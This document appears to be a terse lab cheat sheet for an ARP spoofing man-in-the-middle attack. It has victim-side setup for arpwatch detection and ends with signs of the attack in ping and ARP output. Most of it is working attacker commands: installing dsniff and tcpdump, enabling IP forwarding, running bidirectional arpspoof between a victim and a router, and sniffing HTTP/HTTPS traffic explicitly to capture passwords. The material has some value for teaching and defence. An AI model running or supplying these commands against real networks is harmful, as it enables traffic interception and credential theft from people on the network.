# On Victim:
apt install arpwatch
systemctl start arpwatch@eth0 # get with ip link
# Start logging:
tail /var/log/syslog -f | grep arpwatch
Attacker: Install tcpdump and arpspoof
apt install dsniff tcpdump
# Act as Proxy:
# fragrouter -B1
sysctl net.ipv4.conf.eth0.forwarding=1
arpspoof -i eth0 -c own -r -t <VICTIMIP> <ROUTERIP>
# -r means bidirectional poisoning!
tcpdump -i eth0 icmp
# Sniff some pw's on http/s traffic
# tshark -i ath0 -x -Y "http.request" dst host IPROUTER and dst port 80
tcpdump -A src <VICTIMIP> and '(tcp port 80) or (tcp port 443)'
Find malicious redirects on Victim side:
# ping 1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
From ATTACKER: icmp_seq=1 Redirect Host(New nexthop: ROUTER)
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=14.4 ms
# arp -a
ROUTER IP = ATTACKER MAC